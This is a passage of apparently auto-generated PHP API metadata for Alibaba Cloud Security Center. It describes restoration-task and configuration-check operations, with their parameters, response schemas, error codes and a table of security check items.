[\\"/home/admin\\",\\"\\\\\\\\\\\\\\\\servername\\\\\\\\sharename\\"]\\n 2.1.XX.XX\\n s-000f4wxm8f7gur6g2otm.csv\\n 6E3DABB6-3F6A-40DB-9492-2C8B59C****\\n [\\"/home/user\\"]\\n 25766558\\n s-000gmcypy5dy54e39yny\\n 1583289054000\\n r-000gmcypy5dyf9ey3uv7\\n 2021-04-25T19:11Z\\n 1583299054\\n 100\\n 0\\n 0\\n 20\\n \\n","errorExample":""}]', 'title' => 'DescribeRestoreJobs', 'description' => 'If the data on your servers is encrypted by ransomware, you can create a restoration task to restore the data on your servers by using backup data in Security Center.'."\n" ."\n" .'> After you enable an anti-ransomware policy, the data on your servers is backed up based on the policy. For more information about anti-ransomware policies, see [Manage protection policies](~~164781~~).'."\n", 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRestoreJobs'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRestoreJobs', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeRestorePlans' => [ 'summary' => 'Queries restoration tasks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sql-test-001', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the restoration task. Valid values:'."\n" ."\n" .'* **init**: initializing'."\n" .'* **created**: creating'."\n" .'* **running**: running'."\n" .'* **completed**: complete'."\n" .'* **error**: failed'."\n" .'* **restoring**: restoring'."\n", 'type' => 'string', 'required' => false, 'example' => 'running', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578AB****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '33', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RestorePlans' => [ 'description' => 'An array that consists of the restoration tasks.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the restoration task.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the restoration task. Valid values:'."\n" ."\n" .'* **init**: initializing'."\n" .'* **created**: creating'."\n" .'* **running**: running'."\n" .'* **completed**: complete'."\n" .'* **error**: failed'."\n" .'* **restoring**: restoring'."\n", 'type' => 'string', 'example' => 'running', 'title' => ''], 'RestorePoint' => ['description' => 'The point in time to which data is restored.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '165875100****', 'title' => ''], 'UpdatedTime' => ['description' => 'The timestamp when the restoration task was last updated. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '166849080****', 'title' => ''], 'DatabaseName' => ['description' => 'The name of the database.'."\n", 'type' => 'string', 'example' => 'Bankup****', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server on which the database resides.'."\n", 'type' => 'string', 'example' => 'sql-test-001', 'title' => ''], 'TargetInstanceName' => ['description' => 'The name of the destination server.'."\n", 'type' => 'string', 'example' => 'hbr-detection-hh', 'title' => ''], 'TargetDatabaseName' => ['description' => 'The name of the destination database.'."\n", 'type' => 'string', 'example' => 'OABak', 'title' => ''], 'PolicyName' => ['description' => 'The name of the anti-ransomware policy.'."\n", 'type' => 'string', 'example' => 'KtDataBase', 'title' => ''], 'PolicyId' => ['description' => 'The ID of the anti-ransomware policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'TargetInstanceId' => ['description' => 'The ID of the destination server.'."\n", 'type' => 'string', 'example' => 'i-2zehqflgbl9ep2he****', 'title' => ''], 'CreatedTime' => ['description' => 'The timestamp when the restoration task was created. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1655174753****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578AB****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 33,\\n \\"Count\\": 20\\n },\\n \\"RestorePlans\\": [\\n {\\n \\"Status\\": \\"running\\",\\n \\"RestorePoint\\": 0,\\n \\"UpdatedTime\\": 0,\\n \\"DatabaseName\\": \\"Bankup****\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"TargetInstanceName\\": \\"hbr-detection-hh\\",\\n \\"TargetDatabaseName\\": \\"OABak\\",\\n \\"PolicyName\\": \\"KtDataBase\\",\\n \\"PolicyId\\": 123,\\n \\"TargetInstanceId\\": \\"i-2zehqflgbl9ep2he****\\",\\n \\"CreatedTime\\": 0\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeRestorePlans', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRestorePlans'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRestorePlans', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeRiskCheckItemResult' => [ 'summary' => 'Queries the assets that are affected by the risk item detected in configuration assessment based on a specified check item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '173.128.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ItemId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> For more information about the IDs and details of the check items that can be used in configuration assessment, see [DescribeRiskCheckResult](~~113520~~).', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '3BFB4989-A108-46A4-954E-FF7EF02D1078', 'title' => ''], 'PageContentResource' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ContentResource' => [ 'description' => 'The data of the affected assets on each page in a dynamic table.', 'type' => 'object', 'additionalProperties' => ['description' => 'Details of the test results.', 'type' => 'any', 'example' => '{"resultStatus":[{"id":123345,"status":"failed"}],"columns":[{"title":"The available zone where it is located","key":"RegionId"},{"title":"Database instance ID","key":"DBInstanceId"},{"title":"Item value","key":"VulValue"}],"values":[{"DBInstanceId":{"type":"link","value":"dds-bp144b42843****\\n","url":"https://mongodb.console.aliyun.com/replicate/cn-hangzhou/instances/dds-bp144b********/basicInfo"},"VulValue":{"type":"link","value":"0.0.0.0/0","url":"https://mongodb.console.aliyun.com/replicate/cn-hangzhou/instances/dds-b*********/whiteList"},"RegionId":{"type":"text","value":"cn-hangzhou"}}],"emptyGridValue":{"type":"text","value":"No data"},"type":"grid"}', 'title' => ''], 'example' => '{"resultStatus":[{"id":32183150,"status":"failed"}],"columns":[{"title":"所在可用区","key":"RegionId"},{"title":"数据库实例ID","key":"DBInstanceId"},{"title":"问题条目值","key":"VulValue"}],"values":[{"DBInstanceId":{"type":"link","value":"dds-bp144b42843****\\n","url":"https://mongodb.console.aliyun.com/replicate/cn-hangzhou/instances/dds-bp144b42843****/basicInfo"},"VulValue":{"type":"link","value":"0.0.0.0/0","url":"https://mongodb.console.aliyun.com/replicate/cn-hangzhou/instances/dds-bp144b42843****/whiteList"},"RegionId":{"type":"text","value":"cn-hangzhou"}}],"emptyGridValue":{"type":"text","value":"暂无数据"},"type":"grid"}', 'title' => '', ], 'PageSize' => ['description' => 'The number of entries returned on each page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageCount' => ['description' => 'The total number of pages returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RiskItemNotExists', 'errorMessage' => 'risk item not exists', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3BFB4989-A108-46A4-954E-FF7EF02D1078\\",\\n \\"PageContentResource\\": {\\n \\"CurrentPage\\": 1,\\n \\"ContentResource\\": {\\n \\"key\\": \\"{\\\\\\"resultStatus\\\\\\":[{\\\\\\"id\\\\\\":123345,\\\\\\"status\\\\\\":\\\\\\"failed\\\\\\"}],\\\\\\"columns\\\\\\":[{\\\\\\"title\\\\\\":\\\\\\"The available zone where it is located\\\\\\",\\\\\\"key\\\\\\":\\\\\\"RegionId\\\\\\"},{\\\\\\"title\\\\\\":\\\\\\"Database instance ID\\\\\\",\\\\\\"key\\\\\\":\\\\\\"DBInstanceId\\\\\\"},{\\\\\\"title\\\\\\":\\\\\\"Item value\\\\\\",\\\\\\"key\\\\\\":\\\\\\"VulValue\\\\\\"}],\\\\\\"values\\\\\\":[{\\\\\\"DBInstanceId\\\\\\":{\\\\\\"type\\\\\\":\\\\\\"link\\\\\\",\\\\\\"value\\\\\\":\\\\\\"dds-bp144b42843****\\\\\\\\n\\\\\\",\\\\\\"url\\\\\\":\\\\\\"https://mongodb.console.aliyun.com/replicate/cn-hangzhou/instances/dds-bp144b********/basicInfo\\\\\\"},\\\\\\"VulValue\\\\\\":{\\\\\\"type\\\\\\":\\\\\\"link\\\\\\",\\\\\\"value\\\\\\":\\\\\\"0.0.0.0/0\\\\\\",\\\\\\"url\\\\\\":\\\\\\"https://mongodb.console.aliyun.com/replicate/cn-hangzhou/instances/dds-b*********/whiteList\\\\\\"},\\\\\\"RegionId\\\\\\":{\\\\\\"type\\\\\\":\\\\\\"text\\\\\\",\\\\\\"value\\\\\\":\\\\\\"cn-hangzhou\\\\\\"}}],\\\\\\"emptyGridValue\\\\\\":{\\\\\\"type\\\\\\":\\\\\\"text\\\\\\",\\\\\\"value\\\\\\":\\\\\\"No data\\\\\\"},\\\\\\"type\\\\\\":\\\\\\"grid\\\\\\"}\\"\\n },\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"PageCount\\": 3,\\n \\"Count\\": 1\\n }\\n}","type":"json"}]', 'title' => 'DescribeRiskCheckItemResult', 'description' => 'This interface has been deprecated. Use the upgraded interface ListCheckInstanceResult instead.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskCheckItemResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRiskCheckItemResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeRiskCheckResult' => [ 'summary' => 'Queries the check results of cloud service configurations by check item type or name.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The type of the check item that you want to query. Valid values:'."\n" ."\n" .'- **1**: identity authentication and permissions'."\n" ."\n" .'- **2**: network access control'."\n" ."\n" .'- **3**: log audit'."\n" ."\n" .'- **4**: data security'."\n" ."\n" .'- **5**: monitoring and alerting'."\n" ."\n" .'- **6**: basic security protection'."\n" ."\n" .'> If you do not specify this parameter, all types of check items are queried.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level of the check item that you want to query. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the check results. Valid values:'."\n" ."\n" .'- **pass**'."\n" ."\n" .'- **failed**'."\n" ."\n" .'- **running**'."\n" ."\n" .'- **waiting**'."\n" ."\n" .'- **ignored**'."\n" ."\n" .'- **falsePositive**', 'type' => 'string', 'required' => false, 'example' => 'pass', 'title' => ''], ], [ 'name' => 'AssetType', 'in' => 'query', 'schema' => ['description' => 'The cloud service whose configuration check results you want to query. For more information about the check items for the cloud service, see the check item table in the "Response parameters" section of this topic.', 'type' => 'string', 'required' => false, 'example' => 'RDS', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the check item. For more information about the check item, see the check item table in the "Response parameters" section of this topic.', 'type' => 'string', 'required' => false, 'example' => 'ALB_NetWorkAccessControl', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'QueryFlag', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the check item is supported by the edition of Security Center that you purchase. Valid values:'."\n" ."\n" .'- **enabled**: yes'."\n" ."\n" .'- **disabled**: no', 'type' => 'string', 'required' => false, 'example' => 'enabled', 'title' => ''], ], [ 'name' => 'ItemIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'An array that consists of the IDs of check items. For more information about the check item, see the check item table in the "Response parameters" section of this topic.', 'type' => 'array', 'items' => ['description' => 'An array that consists of the IDs of check items. For more information about the check item, see the check item table in the "Response parameters" section of this topic.', 'type' => 'string', 'required' => false, 'example' => '15', 'title' => ''], 'required' => false, 'example' => '1', 'maxItems' => 100, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'AD271C07-4ACE-413D-AA9B-F14FD3B7717F', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'PageCount' => ['description' => 'The total number of pages returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'List' => [ 'description' => 'The check items.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The risk level of the check item. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'example' => 'high', 'title' => ''], 'Status' => ['description' => 'The status of the check results. Valid values:'."\n" ."\n" .'- **pass**'."\n" ."\n" .'- **failed**'."\n" ."\n" .'- **running**'."\n" ."\n" .'- **waiting**'."\n" ."\n" .'- **ignored**'."\n" ."\n" .'- **falsePositive**', 'type' => 'string', 'example' => 'pass', 'title' => ''], 'Type' => ['description' => 'The type of the check item. Valid values:'."\n" ."\n" .'- Identity authentication and permissions'."\n" ."\n" .'- Network access control'."\n" ."\n" .'- Log audit'."\n" ."\n" .'- Data security'."\n" ."\n" .'- Monitoring and alerting'."\n" ."\n" .'- Basic security protection', 'type' => 'string', 'example' => 'Log audit', 'title' => ''], 'Sort' => ['description' => 'The sequence number in the check results. The check items are sorted based on the sequence number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RepairStatus' => ['description' => 'Indicates whether the risks that are detected based on the check item can be fixed. Valid values:'."\n" ."\n" .'- **enabled**: yes'."\n" ."\n" .'- **disabled**: no', 'type' => 'string', 'example' => 'disabled', 'title' => ''], 'RemainingTime' => ['description' => 'The time when the next check will be performed.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ItemId' => ['description' => 'The ID of the check item. For more information about the check item, see the check item table in the "Response parameters" section of this topic.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'StartStatus' => ['description' => 'Indicates whether the check item is supported by the edition of Security Center that you purchase. Valid values:'."\n" ."\n" .'- **enabled**: yes'."\n" ."\n" .'- **disable**: no', 'type' => 'string', 'example' => 'enabled', 'title' => ''], 'AffectedCount' => ['description' => 'The number of affected assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RiskAssertType' => ['description' => 'The type of the affected assets.', 'type' => 'string', 'example' => 'ECS', 'title' => ''], 'Title' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'RDS - Whitelist Configuration', 'title' => ''], 'TaskId' => ['description' => 'The ID of the check task.', 'type' => 'integer', 'format' => 'int64', 'example' => '15384933', 'title' => ''], 'CheckTime' => ['description' => 'The timestamp when the last check was performed. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1639429164000', 'title' => ''], 'RiskItemResources' => [ 'description' => 'An array that consists of the details about the check item.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ContentResource' => [ 'description' => 'The details about the check results.', 'type' => 'object', 'additionalProperties' => ['description' => 'An array that consists of the details of the check results.', 'type' => 'any', 'example' => '{'."\n" .' "type": "link",'."\n" .' "url": "https://***.aliyun.com/abc.html",'."\n" .' "value": "https://***.aliyun.com/abc.html"'."\n" .'}', 'title' => ''], 'example' => '{ "type": "link", "value": "未开启多因素认证,存在风险\\n", "url": "https://***.aliyun.com/#/secure\\n" }', 'title' => '', ], 'ResourceName' => ['description' => 'The title in the details. Valid values:'."\n" ."\n" .'- **bestPractice**: description'."\n" ."\n" .'- **influence**: risk'."\n" ."\n" .'- **suggestion**: solution'."\n" ."\n" .'- **helpResource**: reference', 'type' => 'string', 'example' => 'bestPractice', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"AD271C07-4ACE-413D-AA9B-F14FD3B7717F\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 12,\\n \\"PageCount\\": 20,\\n \\"Count\\": 10,\\n \\"List\\": [\\n {\\n \\"RiskLevel\\": \\"high\\",\\n \\"Status\\": \\"pass\\",\\n \\"Type\\": \\"Log audit\\",\\n \\"Sort\\": 1,\\n \\"RepairStatus\\": \\"disabled\\",\\n \\"RemainingTime\\": 0,\\n \\"ItemId\\": 1,\\n \\"StartStatus\\": \\"enabled\\",\\n \\"AffectedCount\\": 0,\\n \\"RiskAssertType\\": \\"ECS\\",\\n \\"Title\\": \\"RDS - Whitelist Configuration\\",\\n \\"TaskId\\": 15384933,\\n \\"CheckTime\\": 1639429164000,\\n \\"RiskItemResources\\": [\\n {\\n \\"ContentResource\\": {\\n \\"key\\": \\"{\\\\n \\\\\\"type\\\\\\": \\\\\\"link\\\\\\",\\\\n \\\\\\"url\\\\\\": \\\\\\"https://***.aliyun.com/abc.html\\\\\\",\\\\n \\\\\\"value\\\\\\": \\\\\\"https://***.aliyun.com/abc.html\\\\\\"\\\\n}\\"\\n },\\n \\"ResourceName\\": \\"bestPractice\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeRiskCheckResult', 'description' => 'This operation is phased out. You can use the [ListCheckResult](~~ListCheckResult~~) operation.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => 'The following table describes the information about the check items that are supported by the configuration assessment feature. The information includes the ID, name, type, risk level, and supported service of each check item.'."\n" ."\n" .'| ItemId (check item ID) | Name (check item name) | GroupId (check item type) | RiskLevel (risk level) | AssetType (Alibaba Cloud service) | Description |'."\n" .'| ---------------------- | -------------------------------------------------------------------------------------------- | ------------------------------------------ | ---------------------- | --------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |'."\n" .'| 1 | ActionTrail - logging | 3: log audit | medium | ActionTrail | Checks whether ActionTrail is used to record operation logs on the cloud and save the logs to Object Storage Service (OSS) buckets. |'."\n" .'| 2 | ApsaraDB RDS - database security policies | 4: data security | medium | RDS | Checks whether the SSL encryption, Transparent Data Encryption (TDE), and SQL Audit features are enabled for each ApsaraDB RDS instance. |'."\n" .'| 3 | Alibaba Cloud account security - MFA | 1: identity authentication and permissions | high | RAM | Checks whether multi-factor authentication (MFA) is enabled for the Alibaba Cloud account to which you are logged on. |'."\n" .'| 4 | Alibaba Cloud Security - Back-to-origin configurations of Anti-DDoS Pro or Anti-DDoS Premium | 2: network access control | high | DDoS | Checks whether actual IP addresses of backend servers are hidden after you use Anti-DDoS Pro or Anti-DDoS Premium. If the actual IP addresses are hidden, attackers cannot directly access the backend servers. To hide the actual IP addresses, you can configure access control policies. For example, if you want to hide the IP addresses of Server Load Balancer (SLB) instances, you can configure SLB whitelists on the SLB instances. If you want to hide the IP addresses of Elastic Compute Service (ECS) instances, you can configure security group rules for the ECS instances. All these policies allow access from only back-to-origin IP addresses of Anti-DDoS Pro or Anti-DDoS Premium. |'."\n" .'| 5 | ApsaraDB RDS - whitelist configurations | 2: network access control | high | RDS | Checks whether a whitelist of an ApsaraDB RDS instance contains the CIDR block 0.0.0.0/0. If the whitelist contains the CIDR block, all IP addresses are allowed to access the ApsaraDB RDS instance. For security purposes, we recommend that you configure RDS whitelists to allow access from only specified IP addresses. |'."\n" .'| 6 | SLB - open ports | 2: network access control | high | SLB | Checks whether SLB is configured to forward requests from high-risk ports to the Internet. |'."\n" .'| 7 | Alibaba Cloud Security - back-to-origin configuration checks for WAF | 2: network access control | high | WAF | Checks whether the actual IP addresses of backend servers are hidden after you use Web Application Firewall (WAF). If the actual IP addresses are hidden, attackers cannot directly access the backend servers. To hide the actual IP addresses, you can configure access control policies. For example, if you want to hide the IP addresses of SLB instances, you can configure SLB whitelists on the SLB instances. If you want to hide the IP addresses of ECS instances, you can configure security group rules for the ECS instances. All these policies allow access from only back-to-origin IP addresses of WAF. |'."\n" .'| 8 | Alibaba Cloud Security - agent status | 6: basic security protection | high | ECS | Checks whether the Security Center agent on your ECS instance is always online and provides protection. |'."\n" .'| 12 | OSS - bucket permissions | 4: data security | high | OSS | Checks whether the access control list (ACL) of any of your OSS buckets is public-read or public-read-write. The public-read or public-read-write ACL allows users to read or write the data in your OSS buckets without authentication. To ensure data security, we recommend that you set the ACL of all your buckets to private. |'."\n" .'| 13 | Security Center - detection of AccessKey pair leaks | 5: monitoring and alerting | medium | RAM | Checks whether detection of AccessKey pair leaks is enabled. API credentials, also AccessKey pairs, are unique and important identity credentials. We recommend that you enable the detection to prevent AccessKey pair leaks. |'."\n" .'| 14 | ApsaraDB for MongoDB - whitelist configurations | 2: network access control | high | MongoDB | Checks whether whitelists are enabled for ApsaraDB for MongoDB instances. If whitelists are enabled and a whitelist is empty or contains the 0.0.0.0/0 CIDR block, the requests from all IP addresses are allowed. In this case, security risks may occur. We recommend that you specify trusted IP addresses in a whitelist to allow access from only the specified IP addresses. |'."\n" .'| 15 | RAM - MFA configuration for RAM users | 1: identity authentication and permissions | medium | RAM | Checks whether MFA is enabled for RAM users. |'."\n" .'| 16 | OSS - logging | 4: data security | medium | OSS | Checks whether the logging feature is enabled for all OSS buckets. A large number of logs are generated when OSS resources are accessed. After you enable and configure logging for a bucket, OSS generates log objects every hour based on predefined naming conventions and then stores the log objects in a specified bucket. You can use Alibaba Cloud Data Lake Analytics (DLA) or build a Spark cluster to analyze the logs. You can configure lifecycle rules for a bucket to convert the storage class of log objects to Archive for long-term archiving. |'."\n" .'| 17 | OSS - cross-region replication | 4: data security | low | OSS | Checks whether cross-region replication (CRR) is enabled for all OSS buckets. CRR automatically and asynchronously replicates objects across OSS buckets in different regions. CRR allows you to synchronize operations, such as the create, overwrite, and delete operations on objects, from a source bucket to a destination bucket. This feature can meet your requirements for geo-disaster recovery and data replication. Objects in the destination bucket are extra duplicates of objects in the source bucket. They have the same names, content, and metadata, such as the creation time, owner, user metadata, and ACL. |'."\n" .'| 18 | ApsaraDB RDS - database backup | 4: data security | medium | RDS | Checks whether database backup is enabled for ApsaraDB RDS instances. We recommend that you enable database backup for ApsaraDB RDS instances and perform a data backup task on a daily basis. |'."\n" .'| 19 | ApsaraDB for Redis - whitelist configurations | 2: network access control | high | Redis | Checks access control configurations of ApsaraDB for Redis instances. |'."\n" .'| 20 | ECS - public key authentication | 1: identity authentication and 